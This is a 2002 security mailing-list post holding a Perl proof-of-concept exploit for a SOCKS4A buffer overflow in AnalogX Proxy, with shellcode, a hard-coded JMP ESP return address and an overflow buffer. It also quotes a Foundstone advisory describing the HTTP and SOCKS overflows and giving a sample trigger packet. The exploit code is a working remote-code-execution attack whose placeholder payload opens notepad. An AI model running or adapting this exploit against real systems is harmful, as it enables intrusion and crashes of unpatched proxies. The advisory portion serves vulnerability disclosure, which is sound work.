This is a proof of concept exploit for AnalogX Proxy SOCKS4A buffer overflow. Tested on Japanese Windows 2000 Professional SP2. #!/usr/local/bin/perl #----------------------------------------------------------- # AnalogX Proxy Version 4.10 exploit for Japanese Windows 2000 Pro (SP2) # written by Kanatoko # http://www.jumperz.net/ # thanx to: hsj (http://hsj.shadowpenguin.org/) #----------------------------------------------------------- use Socket; $connect_host = "socks.example.com"; $port = 1080; $iaddr = inet_aton($connect_host) || die "Host Resolve Error.\n"; $sock_addr = pack_sockaddr_in($port,$iaddr); socket(SOCKET,PF_INET,SOCK_STREAM,0) || die "Socket Error.\n"; connect(SOCKET,$sock_addr) || die "Connect Error\n"; select(SOCKET); $|=1; select(STDOUT); # egg written by UNYUN (http://www.shadowpenguin.org/) # 57bytes $egg = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2"; $egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7"; $egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C"; $egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB"; $egg .= "\xFD\xE8\xD4\xFF\xFF\xFF"; $egg .= "notepad.exe"; $buf = "\x04\x01\x00\x19\x00\x00\x00\x01"; $buf .= "A" x 32; $buf .= $egg; $buf .= "\x00"; $buf .= "A" x 144; # JMP ESP in user32.dll( Japanese Windows 2000 Pro SP2 ) : 0x77DF492B # If you use English Windows 2000, try 0x77E2492B $buf .= "\x2B\x49\xdf\x77"; # JMP +0x22 $buf .= "\xEB\x22"; $buf .= "\x00"; print SOCKET $buf; -- Kanatoko JUMPER : http://www.jumperz.net/(Japanese) On Mon, 1 Jul 2002 15:54:55 -0600 (MDT) Dave Ahmad wrote: > > > Dave Ahmad > SecurityFocus > www.securityfocus.com > > ---------- Forwarded message ---------- > Return-Path: > Delivered-To: da@securityfocus.com > Received: (qmail 13630 invoked from network); 1 Jul 2002 21:32:14 -0000 > Received: from unknown (HELO mission.foundstone.com) (66.192.0.2) > by mail.securityfocus.com with SMTP; 1 Jul 2002 21:32:14 -0000 > X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3 > content-class: urn:content-classes:message > MIME-Version: 1.0 > Content-Type: text/plain; > charset="us-ascii" > Content-Transfer-Encoding: quoted-printable > Subject: Foundstone Advisory - Buffer Overflow in AnalogX Proxy > Date: Mon, 1 Jul 2002 14:37:44 -0700 > Message-ID: <9DC8A3D37E31E043BD516142594BDDFAC47577@MISSION.foundstone.com> > X-MS-Has-Attach: > X-MS-TNEF-Correlator: > Thread-Topic: Foundstone Advisory - Buffer Overflow in AnalogX Proxy > Thread-Index: AcIhR4n3TkCXBJz4TAqNDSFSrIolUg== > From: "Foundstone Labs" > To: > > ---------------------------------------------------------------------- > FS Advisory ID: FS-070102-23-AXPR > > Release Date: July 1st, 2002 > > Product: AnalogX Proxy > > Vendor: AnalogX (http://www.analogx.com) > > Vendor Advisory: See vendor web site > > Type: Buffer Overflow > > Severity: High > > Author: Robin Keir (robin.keir@foundstone.com) > Foundstone, Inc. > (http://www.foundstone.com) > > Operating Systems: Windows variants > > Vulnerable versions: Proxy v4.07 and previous > > Foundstone Advisory: http://www.foundstone.com/advisories.htm > --------------------------------------------------------------------- > > Description > > A buffer overflow exists in AnalogX's Proxy software. > Exploitation of this vulnerability allows remote execution of > arbitrary code with the privileges of the Proxy daemon. > > Details > > Web Proxy overflow > > Sending a HTTP proxy request to the target system on TCP port 6588 > consisting of a single space character followed by 320 or more > non-space characters followed by 2 carriage-return linefeeds causes > a read access violation in the application. Manually dismissing the > application error message box that is displayed on the affected system > at this point will terminate the process. If the message box is not > manually dismissed then repeated sending of the request causes repeated > access violation message boxes to appear on the affected system up to > the point where the service no longer responds. > > Different number of bytes sent cause different error conditions > to occur, such as write access violations and Watcom memory > error dialogs to appear. > > Socks4a buffer overflow. > > Sending a Sock4a request to the target system on TCP port 1080 > consisting > of a hostname section of 140 or more characters will cause a write > access > violation application error. Manually dismissing the application error > message box that is displayed on the affected system at this point will > terminate the process. If the message box is not manually dismissed then > > repeated sending of the request causes repeated access violation message > > boxes to appear on the affected system up to the point where the service > > no longer responds. > > An example TCP packet to send is > > \x04\x01\x04\x38\x00\x00\x00abcd\x00#\x00 > > where the '\xXX' characters signify their corresponding HEX binary > values and > the '#' is substituted with the DNS name of 140 or more characters. > > Solution: > > Refer to the vendor's web site for further details: > http://www.analogx.com > > Credits: > > Foundstone would like to thank AnalogX for their prompt > response and handling of this problem. > > > Disclaimer: > > The information contained in this advisory is copyright (c) 2002 > Foundstone, Inc. and is believed to be accurate at the time of > publishing, but no representation of any warranty is given, > express, or implied as to its accuracy or completeness. In no > event shall the author or Foundstone be liable for any direct, > indirect, incidental, special, exemplary or consequential > damages resulting from the use or misuse of this information. > This advisory may be redistributed, provided that no fee is > assigned and that the advisory is not modified in any way. > >